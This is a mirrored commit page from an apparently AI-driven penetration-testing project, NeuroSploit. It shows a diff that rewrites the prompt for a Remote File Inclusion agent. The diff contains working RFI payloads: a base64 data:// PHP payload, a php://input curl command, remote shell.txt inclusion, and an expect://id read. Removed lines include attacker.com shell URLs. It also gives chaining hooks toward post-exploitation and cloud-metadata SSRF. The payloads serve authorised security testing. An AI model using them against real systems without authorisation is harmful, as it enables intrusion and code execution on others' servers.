mirror of
https://github.com/CyberSecurityUP/NeuroSploit.git
synced 2026-09-30 13:09:36 +02:00
feat: deepen 268 exploitation skills; web session delete; CSS design system; JEV progress checkpoint
agents_md (skills):
- enrich all 255 vulns/ + 13 chains/ agents from thin one-liner stages to
concrete playbooks: exact tools/commands, per-stack decision points, benign
proof markers (unique OOB nonces, single reads, URLDNS-before-exec), explicit
proof criteria, false-positive/pitfall sections, and chaining hooks. Every
contract preserved (## User/System Prompt, {target}/{recon_json}, FINDING
block, CWE/Severity, credits). avg 37->53 lines; loader parses all 449.
web console:
- delete a session/report: DELETE /api/runs/:id and DELETE /api/runs (all),
a Delete button in the run detail and a hover ✕ per sidebar row (tested e2e)
- CSS design system: tokenise the loose values into one scale — 8-step type
scale (was 10 ad-hoc sizes), radius/z-index/motion/scrim/terminal tokens,
fix an undefined var(--muted); 66 tokens, 0 loose font sizes, all var() resolve
- stale version labels 4.0.0/4.2.0 -> 4.2.1
harness (JEV / System One):
- typesafe::progress_checkpoint (jev-skill agent-checkpoint pattern:
continue/pivot/stop) wired into the attack-chain loop to stop looping rounds
early; works with TypeSafe or local Laya via from_env(); honours --typesafe off
- 390 tests passing
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
This commit is contained in:
1 parent
5ab6451c15
commit
f82e3fe265
272 files changed
+7640
-3195
No files matched your search
+26
-17
@@ -1,30 +1,39 @@
|
||||
# Remote File Inclusion Specialist Agent
|
||||
|
||||
## User Prompt
|
||||
You are testing **{target}** for Remote File Inclusion (RFI).
|
||||
You are testing **{target}** for Remote File Inclusion (RFI) — a parameter whose value the server fetches and includes/executes as code from a location you control.
|
||||
|
||||
**Recon Context:**
|
||||
{recon_json}
|
||||
|
||||
**METHODOLOGY:**
|
||||
**METHODOLOGY — RFI is RCE. Prove the server fetched and executed YOUR content, not that it merely reflected a URL.**
|
||||
|
||||
### 1. Identify Inclusion Parameters
|
||||
- Same as LFI parameters: `page=`, `file=`, `include=`, `url=`, `path=`
|
||||
- RFI requires `allow_url_include=On` (PHP) or similar config
|
||||
### 1. Identify inclusion parameters
|
||||
- Same surface as LFI: `page=`, `file=`, `include=`, `template=`, `lang=`, `url=`, `path=`, `doc=`.
|
||||
- RFI needs a dynamic-include sink (PHP `include`/`require` with a URL, ColdFusion `cfinclude`, JSP dynamic include). PHP additionally needs `allow_url_include=On` (rare post-5.2) — so also treat data:/php:// wrappers as the realistic modern path.
|
||||
- DECISION: recon fingerprint decides the payload — PHP → wrappers + http include; classic ASP/JSP → protocol-relative or UNC include; anything else → likely LFI-only, hand off.
|
||||
|
||||
### 2. RFI Payloads
|
||||
- `http://attacker.com/shell.txt` (PHP code without .php extension)
|
||||
- `https://attacker.com/shell.txt`
|
||||
- `ftp://attacker.com/shell.txt`
|
||||
- `data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==` (base64 phpinfo)
|
||||
- `expect://id` (if expect wrapper enabled)
|
||||
### 2. Blind existence check FIRST (OOB, before any code)
|
||||
- Point the param at a per-attempt OOB host and watch for the fetch: `?page=http://<nonce>.oob.example/probe` then check your listener/`interactsh-client` for a hit carrying `<nonce>`.
|
||||
- A DNS/HTTP callback correlated to THIS nonce proves the server-side fetch — the prerequisite for RFI — before you ever serve executable content.
|
||||
|
||||
### 3. Detection Without External Server
|
||||
- Use `http://127.0.0.1/` to test if URL inclusion works
|
||||
- Use `data://` wrapper for self-contained proof
|
||||
- Test `php://input` with POST body
|
||||
### 3. Deliver benign, self-contained proof
|
||||
- `data://` wrapper (no external server, safest): `?page=data://text/plain;base64,PD9waHAgZWNobyAiUkZJLXtub25jZX0iOyBlY2hvIG1kNSgxKTsgPz4=` — decodes to `<?php echo "RFI-{nonce}"; echo md5(1); ?>`; success = the page renders `RFI-{nonce}` and `c4ca4238a0b923820dcc509a6f75849b`.
|
||||
- Remote include (when allow_url_include on): host `shell.txt` containing `<?php echo "RFI-{nonce}"; echo 7*7; ?>` and request `?page=http://<nonce>.oob.example/shell.txt`; success = body shows `RFI-{nonce}49`.
|
||||
- `php://input`: `curl {target}/?page=php://input --data '<?php echo 7*191; ?>'` → look for `1337`.
|
||||
- `expect://id` only if the expect wrapper is enabled (rare) — a single read, never destructive.
|
||||
- Keep it BENIGN: a unique marker + one arithmetic/`phpinfo()`/`id` proof. Never write files, never fetch a real webshell, never run destructive commands.
|
||||
|
||||
### 4. Report
|
||||
### 4. Confirm execution vs mere inclusion
|
||||
- PROOF = the marker/arithmetic result rendered in the response, OR the correlated OOB callback for the blind stage. `phpinfo()` output is also definitive.
|
||||
- FALSE-POSITIVE guards: the URL echoed back verbatim (reflected, not executed) is NOT RFI. A fetch that returns the raw `<?php ... ?>` text unexecuted = SSRF/inclusion-without-exec, downgrade accordingly. `allow_url_fopen` on but `allow_url_include` off → SSRF only, report as such.
|
||||
|
||||
### 5. Chaining hooks
|
||||
- Confirmed code exec → hand to the RCE / post-exploitation scope for shell, `whoami`, host enumeration.
|
||||
- Only a server-side fetch (no exec) → hand to the SSRF agent (hit internal hosts / cloud metadata).
|
||||
- Wrapper read of local files works → hand to LFI/source-disclosure.
|
||||
|
||||
### 6. Report
|
||||
```
|
||||
FINDING:
|
||||
- Title: Remote File Inclusion in [parameter] at [endpoint]
|
||||
@@ -38,4 +47,4 @@ FINDING:
|
||||
```
|
||||
|
||||
## System Prompt
|
||||
You are an RFI specialist. RFI is critical severity as it leads directly to RCE. Confirm by showing that a remote resource was actually fetched and included/executed by the server. Use safe payloads (phpinfo, echo) not destructive ones.
|
||||
You are an RFI specialist. RFI is Critical because it leads directly to RCE. Do a blind OOB existence check (per-attempt nonce) BEFORE serving executable content, then confirm with a benign self-contained proof (data:// wrapper or a marker+arithmetic payload) that the server EXECUTED your content — a reflected/echoed URL or unexecuted raw source is not RFI (downgrade to SSRF/inclusion). Use only safe payloads (phpinfo, echo, arithmetic, id); never destructive ones. Report only what a rendered marker or a correlated callback proves.
|
||||
Reference in new issue
Block a user